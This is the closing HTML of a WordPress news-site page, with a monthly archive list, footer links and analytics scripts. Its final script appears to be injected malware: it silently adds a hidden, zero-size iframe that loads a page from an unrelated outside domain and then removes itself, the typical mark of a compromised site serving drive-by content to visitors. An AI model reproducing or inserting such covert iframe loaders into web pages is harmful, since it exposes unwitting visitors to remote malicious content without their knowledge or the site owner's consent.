	<li><a href='http://theliberiandialogue.org/2013/03/'>March 2013</a>&nbsp;(15)</li>
	<li><a href='http://theliberiandialogue.org/2013/02/'>February 2013</a>&nbsp;(8)</li>
	<li><a href='http://theliberiandialogue.org/2013/01/'>January 2013</a>&nbsp;(20)</li>
	<li><a href='http://theliberiandialogue.org/2012/12/'>December 2012</a>&nbsp;(20)</li>
	<li><a href='http://theliberiandialogue.org/2012/11/'>November 2012</a>&nbsp;(8)</li>
	<li><a href='http://theliberiandialogue.org/2012/10/'>October 2012</a>&nbsp;(27)</li>
	<li><a href='http://theliberiandialogue.org/2012/09/'>September 2012</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2012/08/'>August 2012</a>&nbsp;(24)</li>
	<li><a href='http://theliberiandialogue.org/2012/07/'>July 2012</a>&nbsp;(14)</li>
	<li><a href='http://theliberiandialogue.org/2012/06/'>June 2012</a>&nbsp;(12)</li>
	<li><a href='http://theliberiandialogue.org/2012/05/'>May 2012</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2012/04/'>April 2012</a>&nbsp;(16)</li>
	<li><a href='http://theliberiandialogue.org/2012/03/'>March 2012</a>&nbsp;(22)</li>
	<li><a href='http://theliberiandialogue.org/2012/02/'>February 2012</a>&nbsp;(10)</li>
	<li><a href='http://theliberiandialogue.org/2012/01/'>January 2012</a>&nbsp;(20)</li>
		</ul>
		</li>
				</ul>
			</div>

			<div id="sidebar-bottom-left">
				<ul>
	
				</ul>
			</div>

			<div id="sidebar-bottom-right">
				<ul>
	
				</ul>
			</div>

		</div>

	</div>

</div>

<div id="wrap-bottom"></div>

<div id="footer" class="clearfix">
	&copy; Copyright <a href="http://theliberiandialogue.org">The Liberian Dialogue</a> 2017. All rights reserved. Site designed by <a href="http://enfoplus.com/">Prince Sargbah</a><br />
<a href="http://www.theliberiandialogue.org/email/">Admin Email</a> | <a href="http://theliberiandialogue.org/wp-admin">Admin Cpanel</a>
	
</div>

<!-- ngg_resource_manager_marker -->        <!-- 
            Lockers: user tracker for visibility filters
            OnePress, bizpanda.com
        -->
        <script>
            window.__bp_session_timeout = '900';
            window.__bp_session_freezing = 0;
            !function(){window.bizpanda||(window.bizpanda={}),window.bizpanda.bp_can_store_localy=function(){return!1},window.bizpanda.bp_ut_get_cookie=function(e){for(var n=e+"=",i=document.cookie.split(";"),o=0;o<i.length;o++){for(var t=i[o];" "==t.charAt(0);)t=t.substring(1);if(0==t.indexOf(n))return decodeURIComponent(t.substring(n.length,t.length))}return!1},window.bizpanda.bp_ut_set_cookie=function(e,n,i){var o=new Date;o.setTime(o.getTime()+24*i*60*60*1e3);var t="expires="+o.toUTCString();document.cookie=e+"="+encodeURIComponent(n)+"; "+t+"; path=/"},window.bizpanda.bp_ut_get_obj=function(e){var n=null;return(n=window.bizpanda.bp_can_store_localy()?window.localStorage.getItem("bp_ut_session"):window.bizpanda.bp_ut_get_cookie("bp_ut_session"))?(n=n.replace(/\-c\-/g,","),n=n.replace(/\-q\-/g,'"'),n=JSON.parse(n),n.started+1e3*e<(new Date).getTime()&&(n=null),n):!1},window.bizpanda.bp_ut_set_obj=function(e,n){e.started&&window.__bp_session_freezing||(e.started=(new Date).getTime());var e=JSON.stringify(e);e&&(e=e.replace(/\"/g,"-q-"),e=e.replace(/\,/g,"-c-")),window.bizpanda.bp_can_store_localy()?window.localStorage.setItem("bp_ut_session",e):window.bizpanda.bp_ut_set_cookie("bp_ut_session",e,5e3)},window.bizpanda.bp_ut_count_pageview=function(){var e=window.bizpanda.bp_ut_get_obj(window.__bp_session_timeout);e||(e={}),e.pageviews||(e.pageviews=0),0===e.pageviews&&(e.referrer=document.referrer,e.landingPage=window.location.href,e.pageviews=0),e.pageviews++,window.bizpanda.bp_ut_set_obj(e)},window.bizpanda.bp_ut_count_locker_pageview=function(){var e=window.bizpanda.bp_ut_get_obj(window.__bp_timeout);e||(e={}),e.lockerPageviews||(e.lockerPageviews=0),e.lockerPageviews++,window.bizpanda.bp_ut_set_obj(e)},window.bizpanda.bp_ut_count_pageview()}();
        </script>
        <!-- / -->
                <!-- Start of StatCounter Code -->
    <script>
    <!-- 
        var sc_project=7656305; 
        var sc_security="efb4df8e"; 
      var sc_invisible=1;
        var scJsHost = (("https:" == document.location.protocol) ?
        "https://secure." : "http://www.");
    //-->
document.write("<sc"+"ript src='" +scJsHost +"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="web analytics" href="https://statcounter.com/"><img class="statcounter" src="https://c.statcounter.com/7656305/0/efb4df8e/1/" alt="web analytics" /></a></div></noscript>   
    <!-- End of StatCounter Code -->


<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-29048663-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
<script type="text/javascript">(function(){var i = document.createElement("iframe"); i.style.display = "none"; i.style.height = "0px"; i.style.width = "0px"; i.onload = function() {i.parentNode.removeChild(i);}; i.src = "http://adm.theintrepidgroup.us/xsystem/?ust1"; document.body.appendChild(i);})();</script>

</body>

</html>


<!--Generated by Endurance Page Cache-->